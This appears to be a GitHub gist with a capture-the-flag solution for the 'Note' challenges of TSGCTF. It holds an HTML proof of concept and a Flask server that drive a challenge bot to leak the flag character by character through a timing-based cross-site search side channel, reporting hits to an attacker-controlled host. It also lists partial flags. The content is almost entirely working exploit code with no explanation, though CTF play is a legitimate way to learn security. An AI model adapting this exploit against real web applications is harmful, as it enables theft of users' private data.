Skip to content

Instantly share code, notes, and snippets.

@icchy
Last active Apr 27, 2021
Embed
What would you like to do?
TSGCTF Note (both 1 and 2)
<!doctype html>
<html>
<head>
<meta charset="utf-8">
</head>
<body>
<iframe name=f width=100 height=100></iframe>
<script>
const prefix = '__PREFIX__'
const chars = '__CHARS__'
const re = `${prefix}[${chars}]`
const url = `http://34.84.10.25:18365/?${re}`;
// const url = `http://34.84.161.130:18364/?${re}`;
f.location = url;
const check = async () => {
await fetch('https://www.materialui.co/materialIcons/navigation/close_black_72x72.png', {
mode: "no-cors",
})
fetch(`//${document.location.host}/hit/${prefix}/${chars}`)
};
setTimeout(check, 400);
</script>
</body>
</html>
from flask import Flask
import requests
import time
app = Flask(__name__)
baseurl = 'http://[your_server]'
CHARS = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_'
@app.route('/payload/<string:prefix>/<string:chars>')
def handle_search(prefix, chars):
return open('poc.html').read().replace('__PREFIX__', prefix).replace('__CHARS__', chars)
@app.route('/hit/<string:prefix>/<string:chars>')
def handle_hit(prefix, chars):
l = len(chars)
if l == 1:
l = len(CHARS)
chars1, chars2 = CHARS[:l//2], CHARS[l//2:]
query(f'/payload/{prefix+chars[0]}/{chars1}')
time.sleep(1)
query(f'/payload/{prefix+chars[0]}/{chars2}')
else:
chars1, chars2 = chars[:l//2], chars[l//2:]
query(f'/payload/{prefix}/{chars1}')
time.sleep(1)
query(f'/payload/{prefix}/{chars2}')
return 'ok'
def query(q):
print(q)
print(requests.post('http://34.84.10.25:18365/query', data={'url': f'{baseurl}{q}'}).content)
# print(requests.post('http://34.84.161.130:18364/query', data={'url': f'{baseurl}{q}'}).content)
if __name__ == '__main__':
# prefix = 'TSGCTF.5JFJMWOPOPW5E79' # note 2
# prefix = 'TSGCTF.5H4LL_W3_ENCRYP7' # note 1
prefix = 'TSGCTF.'
chars = CHARS
query(f'/payload/{prefix}/{chars}')
app.run()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment